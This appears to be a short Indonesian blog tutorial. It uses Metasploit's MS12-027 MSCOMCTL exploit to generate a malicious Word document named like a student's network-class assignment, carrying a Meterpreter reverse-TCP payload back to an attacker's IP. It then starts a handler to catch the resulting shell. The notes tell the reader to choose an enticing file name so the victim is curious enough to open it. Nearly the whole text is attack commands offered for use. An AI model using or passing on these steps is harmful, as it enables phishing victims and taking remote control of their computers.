seperti biasa kita jalankan terlebih dahulu service postgresql dan metasploit, perintahnya;
service posgresql startselanjutnya kita buka msfconsole
service metasploit start
msfconsole
use exploit/windows/fileformat/ms12_027_mscomctl_bof
set payload windows/meterpreter/reverse_tcp
set filename TUGAS_JARKOM.doc
set lhost 192.168.1.106
exploit
Keterangan:
use exploit/windows/fileformat/ms12_027_mscomctl_bof --> Type exploit yang digunakan
set payload windows/meterpreter/reverse_tcp --> Mengatur payload yang di gunakan ke sebuah target ketika shell sudah terpasang
set filename TUGAS_JARKOM.doc --> Nama file backdor, buat semenarik mungkin agar korban penasaran untuk membukanya
set lhost 192.168.1.106 --> Ip Attacker, isi sesuai dengan IP anda
exploit --> Perintah untuk menghasilkan file PDF (backdoor)
kenapa saya tidak memasukan lport, karena disini saya menggunakan port default metasploit.
setelah backdoor terbuat lalu jalankan perintah exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.106
exploit
Posting Komentar
Click to see the code!
To insert emoticon you must added at least one space before the code.